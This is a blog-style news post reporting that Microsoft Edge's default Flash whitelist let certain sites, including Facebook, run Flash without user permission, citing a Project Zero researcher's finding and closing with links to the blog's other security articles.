// NEWS // Edge Lets Facebook Execute Flash Code Without Your Permission!

The default browser in Windows 10 contains a whitelist that is hard to justify and that exposes users to uncontrollable attacks.

Source

The Windows 10 browser whitelist can execute Flash code without the user’s permission.
Until February, this list contained 58 entries for as many sites, including sub-domains of Microsoft, Deezer, Yahoo or QQ (a Chinese social network). The most surprising - and which raises questions about the thinking that presided over the composition of this list - is the presence of a Spanish hairdresser website

The default Flash whitelist in the Edge really surprised me. So many sites for which I'm completely baffled as to why they're there. Like a site of a hairdresser in Spain ?! I wonder how the list was formed. And if MSRC knew about it. - Ivan Fratric (@ifsecure) February 19, 2019

What does that entail

These different sites could bypass the click-to-play policy which permits that Flash content on a website can only be executed if the user explicitly allows it.

Ivan Fratric, Google Project Zero security researcher, who discovered this whitelist and reported the bug last November believes this poses a big security problem, as some of these pre-authorized sites are known to suffer from XSS vulnerabilities. This could lead to the execution of dangerous Flash code and the PC using Edge contamination.

Now Microsoft has narrowed the whitelist to just 2 areas of Facebook: the main site and its subdomain apps.facebook.com. The security researcher wonders about the need to maintain a dangerous free-pass for Facebook. (I think it is to allow the execution of many Flash games present on the social platform, but how to be sure?..)

The context

Flash technology is expected to retire partially or semi-definitively in 2020 because it is widely criticized for safety. It is a real nest of breaches which should be avoided as much as possible on a daily basis. Browsers as Brave tend to block the default execution.

• I've made a lot of articles with tools, explanations and advises to show you how to protect your privacy and to secure your computer, GO check them out!

  • This is my guide to secure your PC after a fresh installation of Windows

  • If you think that your phone or your PC has been hacked, you have to check it right now!

  • That's how you can be more Anonymous on the internet!

  • The future of Cyber-Security, what to expect?

  • These are the best VPN to protect your numeric life: NordVPN, ExpressVPN and CyberGhost!

  • Your PC is slow? That's why!

  • Why is it important to be discreet on the Internet

  • The 4 security measure to put in place on your WIFI router

  • The security guide everyone must have on holidays!

  • Feel hot? Your computer also!

  • How an adware works?

  • That's how you should guard against Trojan!

  • Why antiviruses are not your friend?!

  • Basics tools to protect your privacy and your computer

  • What are the different types of hackers?